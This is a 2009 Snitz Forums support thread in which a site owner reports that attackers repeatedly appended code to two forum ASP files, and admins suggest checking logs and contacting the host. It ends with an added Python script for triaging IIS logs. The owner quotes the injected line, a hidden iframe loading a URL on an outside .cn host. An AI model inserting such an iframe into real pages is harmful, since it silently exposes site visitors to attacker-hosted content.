Snitz Forums 2000
 Virus attacked

thelodger
Junior Member

United Kingdom
296 Posts

Posted - 11 June 2009 :  10:46:03
Hi guys, we have had an attack, it's quite a minor attack, someone added some code at the bottom of 2 files: default.asp and default_group.asp.

Now I have no idea how anyone could have done that, no one has our FTP password or indeed details.

How can I stop this from happening again?

HuwR
Forum Admin

United Kingdom
20592 Posts

Posted - 11 June 2009 :  11:02:10
Without some more information, it will be very difficult to give any advice.

For a start, what version of the code are you running, what exactly was the code they added?

thelodger
Junior Member

United Kingdom
296 Posts

Posted - 11 June 2009 :  11:13:30
OK I am running the latest version of the code, when I got back in someone has added the line in red to the bottom of the 2 files above

quote:
WriteFooter
%>

<iframe src="http://lotwager.cn:8080/ts/in.cgi?pepsi57" width=125 height=125 style="visibility: hidden"></iframe>

ruirib
Snitz Forums Admin

Portugal
26364 Posts

Posted - 11 June 2009 :  11:15:16
Either you have an upload mod with a hole, or your server was hacked, cause those would be the ways to actually change code files in your site.


Snitz 3.4 Readme | Like the support? Support Snitz too

thelodger
Junior Member

United Kingdom
296 Posts

Posted - 11 June 2009 :  11:19:12
Cheers mate, I would guess the server was hacked, as the only upload mods I have are the avatar mod and proeders file attachment mod, both of these have been about for ages and I would guess that if a hole was in them, someone would have found it by now?

ruirib
Snitz Forums Admin

Portugal
26364 Posts

Posted - 11 June 2009 :  11:35:46
Better contact the host. I wouldn't vouch on the mods, though. Just allowing certain types of files could be enough.
You can also check the server logs to see if you can find anything weird.



thelodger
Junior Member

United Kingdom
296 Posts

Posted - 11 June 2009 :  12:08:32
Well my hosts were useless, told me I have to look at the logs, but what should I be looking for, I don't have a clue, today's log is massive as it is, for me it's like looking for a pin in a haystack lol

ruirib
Snitz Forums Admin

Portugal
26364 Posts

Posted - 11 June 2009 :  12:15:45
Check the date and time those forum files were changed and then check if there is some file reference in the log, near that time, that's not one of your files. You may not find a thing, as the server may have been hacked through another domain, but you can always try.



HuwR
Forum Admin

United Kingdom
20592 Posts

Posted - 11 June 2009 :  12:19:03
How big is the logfile if you zip it up?

thelodger
Junior Member

United Kingdom
296 Posts

Posted - 11 June 2009 :  12:21:53
It's 27.6 MB as it is

thelodger
Junior Member

United Kingdom
296 Posts

Posted - 11 June 2009 :  12:22:59
I guess I could host it and put up a link?

HuwR
Forum Admin

United Kingdom
20592 Posts

Posted - 11 June 2009 :  12:24:17
Is that zipped? 27Mb is actually quite a small log file; I have seen log files in the 100's of Mb. If it is 27Mb uncompressed it will zip to a very small size, probably only a couple of Mb, in which case, email me using the forum's email system and I will reply so that you can send me the log file and I will take a look at it.

thelodger
Junior Member

United Kingdom
296 Posts

Posted - 11 June 2009 :  12:26:49
Thanks a huge bunch, email on its way.

thelodger
Junior Member

United Kingdom
296 Posts

Posted - 11 June 2009 :  13:04:54
It's 1.44 MG zipped.

thelodger
Junior Member

United Kingdom
296 Posts

Posted - 14 June 2009 :  04:50:00
Happened again, same 2 files, I have the time it happened this time and this is what it says in the log files


quote:
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2009-06-14 04:50:47
#Fields: date time s-sitename s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs-version cs(User-Agent) cs(Cookie) cs(Referer) sc-status sc-substatus sc-win32-status sc-bytes cs-bytes time-taken


Now the change took place at 4:46 and 4:47; the log files seem to stop at 4:35 and start again at 4:50 with the above entry in between.
Anyone shed any light on how they are getting in?

ruirib
Snitz Forums Admin

Portugal
26364 Posts

Posted - 14 June 2009 :  05:30:49
You should talk to the host. Without even log files documenting it, it seems the server has some holes that are allowing it. Without log files it's hard to say they are not getting in through one of your mods.
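
The two checks discussed in this thread (looking near the time the files changed for requests to files that are not part of the site, and noticing that the log has no entries covering the change) can be run mechanically over an IIS W3C log. This is an added example, not code from any poster or from Snitz; the log lines, paths, IP addresses and the names `parse_w3c` and `triage` are constructed for illustration, and the change time is assumed to be in the same time zone as the log.

```python
from datetime import datetime, timedelta

# Constructed sample, not the poster's log: reduced field set, documentation IPs.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2009-06-14 04:33:10 GET /forum/default.asp - 192.0.2.10 200
2009-06-14 04:34:02 POST /forum/uploads/unknown.asp - 198.51.100.7 200
2009-06-14 04:35:41 GET /forum/topic.asp TOPIC_ID=1 192.0.2.11 200
#Software: Microsoft Internet Information Services 6.0
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2009-06-14 04:50:47 GET /forum/default.asp - 192.0.2.12 200
""".splitlines()
KNOWN = {"/forum/default.asp", "/forum/topic.asp"}  # hypothetical list of the site's own files
CHANGED = datetime(2009, 6, 14, 4, 46)  # when the file was modified (assumed same zone as log)

def parse_w3c(lines):
    """Yield one dict per request, using the most recent #Fields header."""
    fields = []
    for line in lines:
        line = line.strip()
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            row = dict(zip(fields, line.split()))
            try:
                row["ts"] = datetime.strptime(f"{row['date']} {row['time']}", "%Y-%m-%d %H:%M:%S")
            except (KeyError, ValueError):
                continue  # truncated or malformed line
            yield row

def triage(lines, changed_at, known_stems, window_min=15, gap_min=10):
    """Return (requests near the change for unknown files, log gaps covering the change)."""
    rows = sorted(parse_w3c(lines), key=lambda r: r["ts"])
    known = {s.lower() for s in known_stems}  # IIS paths are case-insensitive
    suspects = [r for r in rows
                if abs(r["ts"] - changed_at) <= timedelta(minutes=window_min)
                and r.get("cs-uri-stem", "").lower() not in known]
    gaps = [(a["ts"], b["ts"]) for a, b in zip(rows, rows[1:])
            if b["ts"] - a["ts"] > timedelta(minutes=gap_min)
            and a["ts"] <= changed_at <= b["ts"]]
    return suspects, gaps

if __name__ == "__main__":
    suspects, gaps = triage(SAMPLE_LOG, CHANGED, KNOWN)
    for r in suspects:
        print("unknown file:", r["ts"], r["cs-method"], r["cs-uri-stem"], r["c-ip"])
    for start, end in gaps:
        print("no log entries between", start, "and", end)
```

IIS writes W3C log times in UTC by default, while file timestamps are usually shown in local time, so convert one to the other before setting `CHANGED`.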

